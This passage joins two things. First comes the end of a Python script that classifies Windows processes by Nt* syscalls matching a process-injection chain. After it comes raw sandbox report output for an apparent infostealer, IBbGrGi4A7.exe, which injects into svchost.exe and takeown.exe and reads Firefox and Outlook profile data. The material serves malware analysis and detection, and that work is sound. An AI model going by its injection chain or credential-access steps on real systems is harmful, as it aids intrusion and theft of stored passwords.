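NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")  # drops the echoed address token

# Assumed stage model: a process needs at least one call from every stage to
# move code into another process and start it; other calls are listed, not scored.
INJECTION_STAGES = {
    "open_target": {"NtOpenProcess", "NtOpenThread", "NtCreateProcessEx"},
    "place_memory": {"NtAllocateVirtualMemory", "NtCreateSection",
                     "NtMapViewOfSection", "NtUnmapViewOfSection",
                     "NtProtectVirtualMemory"},
    "write_payload": {"NtWriteVirtualMemory"},
    "run_payload": {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread"},
}


def parse_report_lines(text):
    """Yield (process name, stub address as int, [call names]) per listing line."""
    for line in text.splitlines():
        m = LINE_RE.search(line.strip())
        if not m:
            continue
        proc = m.group("path").replace("\\", "/").rsplit("/", 1)[-1]
        addr = int(m.group("addr").rsplit("_", 1)[-1], 16)
        calls = [c.strip() for c in m.group("rest").split(",")]
        yield proc, addr, [c for c in calls if NAME_RE.match(c)]


def classify(text):
    """Per process: Nt* stub -> address, other calls, stage hits, chain verdict."""
    seen = defaultdict(lambda: {"stubs": {}, "other": set()})
    for proc, addr, calls in parse_report_lines(text):
        entry = seen[proc]
        for name in calls:
            if name.startswith("Nt"):
                entry["stubs"].setdefault(name, addr)  # first address seen wins
            else:
                entry["other"].add(name)
    result = {}
    for proc, entry in seen.items():
        present = set(entry["stubs"])
        stages = {s: sorted(present & names) for s, names in INJECTION_STAGES.items()}
        result[proc] = {
            "stubs": entry["stubs"],
            "other_calls": sorted(entry["other"]),
            "stages": stages,
            "injection_chain": all(stages.values()),
        }
    return result


if __name__ == "__main__":
    for proc, info in classify(SAMPLE_LINES).items():
        verdict = "FULL INJECTION CHAIN" if info["injection_chain"] else "no chain"
        print(f"{proc}: {verdict}")
        for stage, names in info["stages"].items():
            print(f"  {stage:14s} {', '.join(names) or '-'}")
        for name, addr in sorted(info["stubs"].items()):
            print(f"  {name:26s} @ 0x{addr:08X}")
        if info["other_calls"]:
            print(f"  other: {', '.join(info['other_calls'])}")
```

Run stand-alone it prints one block per process: svchost.exe and takeown.exe each carry a complete chain (NtOpenProcess; NtMapViewOfSection or NtAllocateVirtualMemory; NtWriteVirtualMemory; NtQueueApcThread, NtSetContextThread or NtResumeThread), while the IBbGrGi4A7.exe entries contribute only Win32 calls and bare addresses. The stub address is kept per name so it can be compared with the loaded-module list elsewhere in the report: whether a stub sits inside ntdll's mapped image or in a region with no backing module is the question behind the report's direct/indirect-syscall signature, and it is the difference between a call that a user-mode hook would see and one it would not.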
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe Code functions (address only):
                    0_2_0031E6A0, 0_2_0033D975, 0_2_003321C5, 0_2_003462D2, 0_2_003903DA, 0_2_0034242E, 0_2_003325FA, 0_2_0036E616,
                    0_2_003266E1, 0_2_0034878F, 0_2_00328808, 0_2_00390857, 0_2_00346844, 0_2_00378889, 0_2_00350B3B, 0_2_0033CB21,
                    0_2_00346DB6, 0_2_00326F9E, 0_2_00323030, 0_2_00333187, 0_2_0033F1D9, 0_2_00311287, 0_2_00331484, 0_2_00325520,
                    0_2_00337696, 0_2_00325760, 0_2_00331978, 0_2_00349AB5, 0_2_0031FCE0, 0_2_0033BDA6, 0_2_00331D90, 0_2_00397DDB,
                    0_2_0031DF00, 0_2_00323FE0, 0_2_031A3600
                Source: C:\Windows\SysWOW64\svchost.exe Code functions (address only):
                    1_2_00418133, 1_2_0040286F, 1_2_00402870, 1_2_0040F8F3, 1_2_0042E8B3, 1_2_004011D0, 1_2_0041634F, 1_2_00416353,
                    1_2_0040DB03, 1_2_0040FB13, 1_2_00404394, 1_2_0040DC47, 1_2_0040DC53, 1_2_00402550, 1_2_00402D70, 1_2_00417E77,
                    1_2_037FA352, 1_2_038003E6, 1_2_0374E3F0, 1_2_037E0274, 1_2_037C02C0, 1_2_037C8158, 1_2_038001AA, 1_2_037DA118,
                    1_2_03730100, 1_2_037F81CC, 1_2_037F41A2, 1_2_037D2000, 1_2_03740770, 1_2_03764750, 1_2_0373C7C0, 1_2_0375C6E0,
                    1_2_03800591, 1_2_03740535, 1_2_037F2446, 1_2_037E4420, 1_2_037EE4F6, 1_2_037FAB40, 1_2_037F6BD7, 1_2_0373EA80,
                    1_2_03756962, 1_2_0380A9A6, 1_2_037429A0, 1_2_0374A840, 1_2_03742840, 1_2_0376E8F0, 1_2_037268B8, 1_2_037B4F40,
                    1_2_03760F30, 1_2_037E2F30, 1_2_03782F28, 1_2_0374CFE0, 1_2_03732FC8, 1_2_037BEFA0, 1_2_03740E59, 1_2_037FEE26,
                    1_2_037FEEDB, 1_2_03752E90, 1_2_037FCE93, 1_2_037DCD1F, 1_2_0374AD00, 1_2_0373ADE0, 1_2_03758DBF, 1_2_03740C00,
                    1_2_03730CF2, 1_2_037E0CB5, 1_2_0372D34C, 1_2_037F132D, 1_2_0378739A, 1_2_037E12ED, 1_2_0375B2C0, 1_2_037452A0,
                    1_2_0372F172, 1_2_0377516C, 1_2_0374B1B0, 1_2_0380B16B, 1_2_037F70E9, 1_2_037FF0E0, 1_2_037EF0CC, 1_2_037470C0,
                    1_2_037FF7B0, 1_2_03785630, 1_2_037F16CC, 1_2_037F7571, 1_2_037DD5B0, 1_2_03731460, 1_2_037FF43F, 1_2_037FFB76,
                    1_2_037B5BF0, 1_2_0377DBF9, 1_2_0375FB80, 1_2_037B3A6C, 1_2_037FFA49, 1_2_037F7A46, 1_2_037EDAC6, 1_2_037DDAAC,
                    1_2_03785AA0, 1_2_037E1AA3, 1_2_03749950, 1_2_0375B950, 1_2_037D5910, 1_2_037AD800, 1_2_037438E0, 1_2_037FFF09,
                    1_2_037FFFB1, 1_2_03741F92, 1_2_03749EB0, 1_2_037F7D73, 1_2_037F1D5A, 1_2_03743D40, 1_2_0375FDC0, 1_2_037B9C32,
                    1_2_037FFCF2
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe Code functions (address only):
                    2_2_04C577F1, 2_2_04C767B1, 2_2_04C60031, 2_2_04C4C292, 2_2_04C5E24D, 2_2_04C5E251, 2_2_04C55A01, 2_2_04C57A11,
                    2_2_04C55B45, 2_2_04C55B51
                Source: C:\Windows\SysWOW64\takeown.exe Code functions (address only):
                    3_2_02FF02C0, 3_2_0302A352, 3_2_030303E6, 3_2_02F7E3F0, 3_2_03010274, 3_2_0300A118, 3_2_030241A2, 3_2_030301AA,
                    3_2_030281CC, 3_2_03002000, 3_2_02FF8158, 3_2_02F60100, 3_2_02F8C6E0, 3_2_02F6C7C0, 3_2_02F70770, 3_2_02F94750,
                    3_2_03030591, 3_2_03014420, 3_2_03022446, 3_2_02F70535, 3_2_0301E4F6, 3_2_0302AB40, 3_2_02F6EA80, 3_2_03026BD7,
                    3_2_02F9E8F0, 3_2_02F568B8, 3_2_0303A9A6, 3_2_02F72840, 3_2_02F7A840, 3_2_02F729A0, 3_2_02F86962, 3_2_03012F30,
                    3_2_02F82E90, 3_2_02F70E59, 3_2_02F7CFE0, 3_2_0302EE26, 3_2_02F62FC8, 3_2_02FEEFA0, 3_2_0302CE93, 3_2_02FE4F40,
                    3_2_02F90F30, 3_2_02FB2F28, 3_2_0302EEDB, 3_2_02F60CF2, 3_2_0300CD1F, 3_2_02F70C00, 3_2_02F6ADE0, 3_2_02F88DBF,
                    3_2_03010CB5, 3_2_02F7AD00, 3_2_0302132D, 3_2_02F8B2C0, 3_2_02F752A0, 3_2_02FB739A, 3_2_02F5D34C, 3_2_030112ED,
                    3_2_02F770C0, 3_2_0303B16B, 3_2_02F7B1B0, 3_2_02F5F172, 3_2_02FA516C, 3_2_0301F0CC, 3_2_0302F0E0, 3_2_030270E9,
                    3_2_0302F7B0, 3_2_030216CC, 3_2_03027571, 3_2_02F61460, 3_2_0300D5B0, 3_2_0302F43F, 3_2_02FB5AA0, 3_2_0302FB76,
                    3_2_02FE3A6C, 3_2_02FADBF9, 3_2_02FE5BF0, 3_2_03027A46, 3_2_0302FA49, 3_2_02F8FB80, 3_2_03011AA3, 3_2_0300DAAC,
                    3_2_0301DAC6, 3_2_03005910, 3_2_02F738E0, 3_2_02FDD800, 3_2_02F79950, 3_2_02F8B950, 3_2_0302FF09, 3_2_02F79EB0,
                    3_2_0302FFB1, 3_2_02F71F92, 3_2_03021D5A, 3_2_03027D73, 3_2_02FE9C32, 3_2_02F8FDC0, 3_2_02F73D40, 3_2_0302FCF2,
                    3_2_02581AA0, 3_2_0257AB10, 3_2_0257CB20, 3_2_0257C900, 3_2_0257AC54, 3_2_0257AC60, 3_2_0258335C, 3_2_02583360,
                    3_2_025713A1, 3_2_02585140, 3_2_0259B8C0, 3_2_02DCE215, 3_2_02DCE0F8, 3_2_02DCD678, 3_2_02DCE5AC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02FB7E54 appears 102 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02FEF290 appears 105 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02FDEA12 appears 86 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02F5B970 appears 280 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 02FA5130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: String function: 00338900 appears 42 times
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: String function: 00317DE1 appears 35 times
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: String function: 00330AE3 appears 70 times
Source: IBbGrGi4A7.exe, 00000000.00000003.866350607.00000000038A3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs IBbGrGi4A7.exe
Source: IBbGrGi4A7.exe, 00000000.00000003.868713689.0000000003A9D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs IBbGrGi4A7.exe
Source: IBbGrGi4A7.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@8/7
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037A06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003681CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0038EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003883BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00314E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | File created: C:\Users\user~1\AppData\Local\Temp\aut484B.tmp
Source: IBbGrGi4A7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: takeown.exe, 00000003.00000002.3328687494.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1259185902.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1259185902.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3328687494.0000000002A72000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: IBbGrGi4A7.exe | ReversingLabs: Detection: 68%
Source: IBbGrGi4A7.exe | Virustotal: Detection: 73%
Source: unknown | Process created: C:\Users\user\Desktop\IBbGrGi4A7.exe "C:\Users\user\Desktop\IBbGrGi4A7.exe"
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\IBbGrGi4A7.exe"
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
Source: C:\Windows\SysWOW64\takeown.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\IBbGrGi4A7.exe"
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
Source: C:\Windows\SysWOW64\takeown.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: wintypes.dll
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\takeown.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\takeown.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: IBbGrGi4A7.exe | Static file information: File size 1167360 > 1048576
Source: IBbGrGi4A7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IBbGrGi4A7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IBbGrGi4A7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IBbGrGi4A7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IBbGrGi4A7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IBbGrGi4A7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IBbGrGi4A7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000001.00000003.1033624904.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033428630.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033641693.0000000003026000.00000004.00000020.00020000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329711852.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: IBbGrGi4A7.exe, 00000000.00000003.867583782.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, IBbGrGi4A7.exe, 00000000.00000003.866481288.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.966581193.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.964597419.0000000003300000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1068446163.0000000002D7D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1065992172.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.00000000030CE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.0000000002F30000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: takeown.pdb source: svchost.exe, 00000001.00000003.1033624904.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033428630.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033641693.0000000003026000.00000004.00000020.00020000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329711852.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: IBbGrGi4A7.exe, 00000000.00000003.867583782.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, IBbGrGi4A7.exe, 00000000.00000003.866481288.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.966581193.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.964597419.0000000003300000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 00000003.00000003.1068446163.0000000002D7D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1065992172.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.00000000030CE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.0000000002F30000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330925884.000000000355C000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1375975018.00000000152DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330925884.000000000355C000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1375975018.00000000152DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329449489.0000000000F4F000.00000002.00000001.01000000.00000005.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330485725.0000000000F4F000.00000002.00000001.01000000.00000005.sdmp
Source: IBbGrGi4A7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IBbGrGi4A7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IBbGrGi4A7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IBbGrGi4A7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IBbGrGi4A7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00314B37 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00338945 push ecx; ret 0_2_00338958
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418800 push ebx; ret 1_2_00418805
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A10F push edi; iretd 1_2_0041A11E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A113 push edi; iretd 1_2_0041A11E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00408138 push es; ret 1_2_00408139
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A1C6 push edi; iretd 1_2_0041A1C7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004139B1 push esp; ret 1_2_00413A0A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413A8F push es; iretd 1_2_00413A9E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401430 push ds; retf 1_2_004014D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040154E push esi; iretd 1_2_00401557
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004015BF push ds; retf 1_2_00401600
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A6EB push cs; ret 1_2_0041A6EC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041EF2A push edi; iretd 1_2_0041EF2D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402FF0 push eax; ret 1_2_00402FF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037309AD push ecx; mov dword ptr [esp], ecx 1_2_037309B6
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Code function: 2_2_04C625E9 push cs; ret 2_2_04C625EA
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Code function: 2_2_04C606FE push ebx; ret 2_2_04C60703
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Code function: 2_2_04C66E28 push edi; iretd 2_2_04C66E2B
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Code function: 2_2_04C5FF51 push eax; retf 2_2_04C5FF52
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Code function: 2_2_04C620C4 push edi; iretd 2_2_04C620C5
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Code function: 2_2_04C6200D push edi; iretd 2_2_04C6201C
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Code function: 2_2_04C62011 push edi; iretd 2_2_04C6201C
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Code function: 2_2_04C50036 push es; ret 2_2_04C50037
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_02F609AD push ecx; mov dword ptr [esp], ecx 3_2_02F609B6
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_02590A7F push esi; retf 3_2_02590A8F
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_02580A9C push es; iretd 3_2_02580AAB
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_02590BFF push esp; iretd 3_2_02590C00
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_025809BE push esp; ret 3_2_02580A17
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_02585060 push eax; retf 3_2_02585061
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_02575145 push es; ret 3_2_02575146
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_0258711C push edi; iretd 3_2_0258712B
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
